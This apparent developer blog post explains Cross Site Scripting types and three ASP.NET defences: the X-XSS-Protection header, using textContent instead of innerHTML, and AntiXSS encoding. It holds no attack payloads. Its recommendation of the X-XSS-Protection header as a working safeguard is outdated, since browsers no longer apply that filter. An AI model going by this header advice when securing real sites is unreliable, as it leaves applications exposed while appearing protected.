π¨βπ»What is Cross Site Scripting (XSS)
Cross Site Scripting (XSS) is a vulnerability that allows an attacker to inject client-side scripts (usually JavaScript) into web pages.
When a user loads an affected page, the attackerβs scripts will be executed, with which they can steal session tokens and cookies, change the content of the web page through DOM manipulation or even redirect the browser. XSS vulnerabilities typically occur when an application takes user input and outputs it to an unvalidated page.
π Types of Cross Site Scripting (XSS) attacks
Persistent XSS attack
In this type of attack, the script is stored forever on the target server and is therefore known as a Persistent Cross Site Scripting attack. This attack tries to inject malicious commands into anything. For example π
- Posting a forum
- Login field
- Entry stored in a database
With this type of attack, all the people who see the infected publication, message or any element, become victims of the attack.
Mirrored XSS attack
In this second attack, the attacker injects the script into the vulnerable site so that it returns it to the user. Among the most common ways to do this are attacked pages in which user input becomes part of a pageβs output.
A search page can display search terms to the user and can provide an avenue for this attack. The script injected into a userβs input should never be stored by the web application.
DOM-based attacks
This third Cross Site Scripting attack happens entirely in the browser. The attack works through manipulating the internal model of the web page within the browser, known as the DOM, and is known as DOM-based attacks.
Like the previous two, this allows the attacker to execute malicious code. The code returned by the server is manipulated into executable JavaScript for the web page.
βHow to prevent Cross-Site Scripting (XSS)
To prevent Cross Site Scripting (XSS) attacks, it is best not to trust any input from the user or any external.
The web application must treat this data as potentially dangerous regardless of the source. We are going to see 3 specific ASP.NET methods to prevent these attacks in a simple way β
Use proper HTTP headers
HTTP headers are part of the requests and responses that are used for any communication. They can instruct the browser to treat the data in a certain way and include instructions that can help increase the security of the website.
The HTTP X-XSS-Protection header will instruct the browser to enable a cross-site scripting filter that can prevent certain cross-site scripting attacks.
One of them is π
X-XSS-Protection: 1;
or
X-XSS-Protection: 1; mode=block;
By setting the header a value of 1, the page will be sanitized if a cross-site scripting attack is detected.
Adding a mode = block;
in the header, the page will stop showing if it detects a Cross Site Scripting (XSS) attack.
To add this HTTP header to your ASP.NET application, simply add the following code in the web.config file, inside <system.webServer>
π
<httpprotocol>
<customheaders>
<add name=βX-XSS-Protectionβ value=β1; mode=blockβ />
</customheaders>
</httpprotocol>
Securely insert data into HTML code
It is important to use the HTML DOM safely and to use safe methods to avoid DOM-based XSS as we have seen before. There are several methods that are available to use when dynamically inserting content into HTML markup, and some of them are more prone to cross-site scripting attacks than others.
For example, when we want to add text to an HTML element, we must use a method that only interprets the information as text and not as HTML code.
This property will interpret all inputs as text π
document.getElementById(βidβ).textContent = βuser dataβ;
While it can interpret HTML elements π
document.getElementById(βidβ).innerHTML = βuser dataβ;
This makes it vulnerable to Cross Site Scripting (XSS) attacks.
Use the AntiXSS library
This library has many methods to prevent Cross Site Scripting (XSS) attacks. It is important to use scripting filter methods based on where the untrusted data will be placed and how it will be placed there. For example:
Before inserting untrusted data into HTML attributes, use the
AntiXSS.HtmlAttributeEncode
method, which is specifically designed to prevent an attacker from escaping an HTML attribute.AntiXSS.HTMLEncode
must be used before adding untrusted data inside HTML elements.
π’Conclution
Preventing Cross Site Scripting (XSS) is not easy. OWASP lists more than 80 vectors that can be targeted using Cross Site Scripting.
Top comments (2)
[[..PingBack...]]
This article was curated as a part of 44th Issue of software Testing Notes.
Perfect! Thanks!